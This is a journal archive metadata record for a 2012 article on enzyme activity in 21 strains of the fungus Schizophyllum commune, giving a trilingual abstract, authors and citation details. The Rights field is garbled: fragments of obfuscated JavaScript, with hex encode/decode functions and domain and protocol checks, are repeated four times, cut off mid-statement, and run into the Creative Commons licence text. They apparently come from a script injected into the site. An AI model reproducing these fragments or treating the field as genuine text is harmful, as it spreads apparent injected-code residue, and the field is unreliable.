ENZIME ACTIVITY OF HIGHER BASIDIOMYCETES MUSHROOM SCHIZOPHYLLUM COMMUNE
Наукові журнали Національного Авіаційного Університету
View Archive InfoField | Value | |
Title |
ENZIME ACTIVITY OF HIGHER BASIDIOMYCETES MUSHROOM SCHIZOPHYLLUM COMMUNE
ФЕРМЕНТАТИВНАЯ АКТИВНОСТЬ ВЫСШЕГО БАЗИДИАЛЬНОГО ГРИБА SCHIZOPHYLLUM COMMUNE ФЕРМЕНТАТИВНА АКТИВНІСТЬ ВИЩОГО БАЗИДІАЛЬНОГО ГРИБА SCHIZOPHYLLUM COMMUNE |
|
Creator |
Бухало, А.С.; Інститут ботаніки ім. М.Г. Холодного НАН України
Дуган, О.М.; Національний технічний університет України «Київський політехнічний інститут» Максимюк, М.Р.; Національний авіаційний університет Ліновицька, В.М.; Національний технічний університет України «Київський політехнічний інститут» |
|
Subject |
complex liquid nourishing mediums; endo-1,4-B-glucanase, exoglucanase; hydrolytic enzymes; monophenolmonooxygenase; qualitative color enzyme reactions; reducing substances; Schizophyllum commune
UDC 582.284.3:577.151.5(045) гидролитические ферменты; качественные цветные ферментативные реакции; комплексные жидкие питательные среды; монофенолмонооксигеназа; редуцирующие вещества; экзоглюканаза; эндо-1,4-глюканаза; Schizophyllum commune УДК 582.284.3:577.151.5(045) гідролітичні ферменти; екзоглюканаза; ендо-1,4-B-глюканаза; комплексні рідкі поживні середовища; монофенолмонооксигеназа; редукуючі речовини; якісні кольорові ферментативні реакції; Schizophyllum commune УДК 582.284.3:577.151.5(045) |
|
Description |
The purpose of this work was a revelation and evaluation of spectrum and activity of hydrolytic enzymes of higher basidiomycetes Schizophyllum commune in a surface and submerged culture. 21 strains of S. commune were object of investigation. Researches were conducted by standard microbiological, biochemical and biotechnological methods. All strains on agar mediums were shown the following enzymes: amylase, caseinase, gelatinase, polygalacturonase, pectattranselyminase, urease, lipase, cellulase, laccase and peroxydase. The demonstration of oxidizing enzymes of laccase and peroxydase depended on composition of medium. The estimation of presence and level of activity of endo-1,4-b-glucanase, exoglucanase and monophenolmonooxygenase at submerged cultivation indicate primary influence of components of complex nourishing medium on enzyme activity of strain 1760 S. commune.
Выполнена оценка спектра и активности гидролитических ферментов у высшего базидиомицета Schizophyllum commune в поверхностной и глубинной культуре. С помощью стандартных микробиологических, биохимических и биотехнологических методов исследованы 21 штамм S. commune. На агаризованных средах у всех штаммов обнаружены следующие ферменты: амилаза, казеиназа, желатиназа, полигалактуроназа, пектаттранселиминаза, уреаза, липаза, целлюлаза, лакказа и пероксидаза. Проявление окислительных фер-ментов лакказы и пероксидазы зависело от состава среды. Оценка наличия и уровня активности эндо-1,4-b-глю-каназы, экзоглюканазы и монофенолмонооксигеназы при глубинном культивировании свидетельствует о значительном влиянии компонентов комплексной питательной среды на ферментативную активность только у штамма 1760 S. commune. Розглянуто активність ферментів гідролітичного комплексу Schizophyllum commune при культи-вуванні на агаризованих середовищах. Показано вплив компонентів комплексних рідких поживних середовищ (пивне сусло, бурякова меляса, кукурудзяний екстракт, пептон, екстракт кормових дріжджів) на ферментативну активність ендо-1,4-b-глюканази, екзоглюканази та монофенолмонооксигенази. Виявлено штамові особливості культур S. commune щодо активності ферментів. |
|
Publisher |
National Aviation University
|
|
Contributor |
—
— — |
|
Date |
2012-10-19
|
|
Type |
—
— — |
|
Format |
application/pdf
|
|
Identifier |
http://jrnl.nau.edu.ua/index.php/visnik/article/view/2369
10.18372/2306-1472.52.2369 |
|
Source |
Proceedings of the National Aviation University; Том 52, № 3 (2012); 154-159
Вестник Национального авиационного университета; Том 52, № 3 (2012); 154-159 Вісник Національного Авіаційного Університету; Том 52, № 3 (2012); 154-159 |
|
Language |
ru
|
|
Rights |
// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
Автори, які публікуються у цьому журналі, погоджуються з такими умовами:Автори залишають за собою право на авторство своєї роботи та передають журналу право першої публікації цієї роботи на умовах ліцензії Creative Commons Attribution License, котра дозволяє іншим особам вільно розповсюджувати опубліковану роботу з обов'язковим посиланням на авторів оригінальної роботи та першу публікацію роботи у цьому журналі.Автори мають право укладати самостійні додаткові угоди щодо неексклюзивного розповсюдження роботи у тому вигляді, в якому вона була опублікована цим журналом (наприклад, розміщувати роботу в електронному сховищі установи або публікувати у складі монографії), за умови збереження посилання на першу публікацію роботи у цьому журналі.Політика журналу дозволяє і заохочує розміщення авторами в мережі Інтернет (наприклад, у сховищах установ або на особистих веб-сайтах) рукопису роботи, як до подання цього рукопису до редакції, так і під час його редакційного опрацювання, оскільки це сприяє виникненню продуктивної наукової дискусії та позитивно позначається на оперативності та динаміці цитування опублікованої роботи (див. The Effect of Open Access).// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e |
|